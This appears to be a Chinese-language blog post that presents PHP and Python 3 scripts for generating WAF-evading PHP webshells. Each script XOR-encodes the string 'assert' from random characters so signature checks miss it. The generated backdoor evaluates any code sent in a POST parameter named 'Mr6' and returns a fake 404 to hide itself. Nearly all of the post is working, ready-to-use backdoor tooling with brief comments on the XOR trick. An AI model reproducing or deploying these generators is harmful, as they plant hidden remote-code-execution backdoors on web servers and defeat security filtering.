php异或 python异或 生成绕waf的后门
注意这里利用了异或运算的自反性:一个值与另一个值异或后,再与同一个值异或即可得回原值,如 (a^b)^b=a。
首先是PHP的:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 | <?php //code by Mr6 error_reporting(0); function randomkeys($length) { $pattern = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; for($i=0;$i<$length;$i++) { $key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)}; //生成php随机数 } return $key; } function randname($length) { $pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; for($i=0;$i<$length;$i++) { @$key.= $pattern{mt_rand(0,strlen($pattern)-1)}; //生成php随机数 } return $key; } $str=randomkeys(6); $bname=randname(4); $lname=strrev(strtolower($bname)); $str2="assert"; echo "<?php \n"; echo "header('HTTP/1.1 404');\n"; echo "class ".$bname."{ public \$c='';\nfunction __destruct(){\n"; for ($i=0;$i<6;$i++) { $name="_".$i; $str3[$i]=bin2hex($str[$i] ^$str2[$i]); echo "$"."$name="; echo "'".$str[$i]."'"."^"."\"\\x".$str3[$i]."\";\n"; } $aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;'; echo $aa; echo "\n"; echo '@$db ("$this->c");}}'; echo "\n"; echo "\${$lname}=new {$bname}();\n"; echo "@\${$lname}->c=\$_POST['Mr6'];\n"; echo "?>\n"; @$file=$_GET['file']; $html = ob_get_contents(); if (isset($file)) { if(file_put_contents($file,$html)) echo "\n\n\n".$file." save success!";} else {echo "Please input the file name like '?file=xxx.txt'";} ?> |
数据来源:https://github.com/yzddmr6/php_xor_bypass/blob/master/xor_2.0.php
然后是python3的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 | # coding=utf-8 import random func = 'assert' shell = '''<?php header('HTTP/1.1 404'); class {0}{2} ${1}=new {0}(); @${1}->c=$_POST['Mr6']; ?>''' def random_keys(len): str = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' return ''.join(random.sample(str, len)) def random_name(len): str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' return ''.join(random.sample(str, len)) def xor(c1, c2): n1 = ord(c1) n2 = ord(c2) n3 = n1 ^ n2 return chr(n3) def build_func(): func_line = '' key = random_keys(len(func)) #取func函数长度(6个)的随机字符 call = '$db=' for i in range(0, len(func)): enc = xor(func[i], key[i]) """这里解释一下enc.encode("utf-8").hex()因为它的结果会是十六进制,php在十六进制前面加入 \\x \\x 开头表示转义字符,后面的数字是字符的ascii码的十六进制形式 该字符表示ASCII码十六进制是13(10进制为19)的字符,为不可见字符""" func_line += "$_{:d}='{}'^\"\\x{}\";".format(i, key[i], enc.encode("utf-8").hex()) #这里相当利用异或从新形成func的值 func_line += '\n' call += '$_{:d}.'.format(i) #累计把call的值 $db累加上面从新计算的func的值 func_line = func_line.rstrip('\n') call = call.rstrip('.') + ';' #rstrip() 删除 string 字符串末尾的指定字符(默认为空格). func_tmpl = '''{ public $c=''; function __destruct(){ %s %s @$db ("$this->c");}}''' % (func_line, call) return func_tmpl def build_webshell(): className = random_name(4) #随机取4个字符 objName = className.lower() #把上面随机取的四个字符变为小写。 func = build_func() shellc = shell.format(className, objName, func) #把上面组合好的做一个完整的拼接 return shellc if __name__ == '__main__': print(build_webshell()) |
只是做了轻微改动,数据来源:https://www.t00ls.net/thread-51338-1-1.html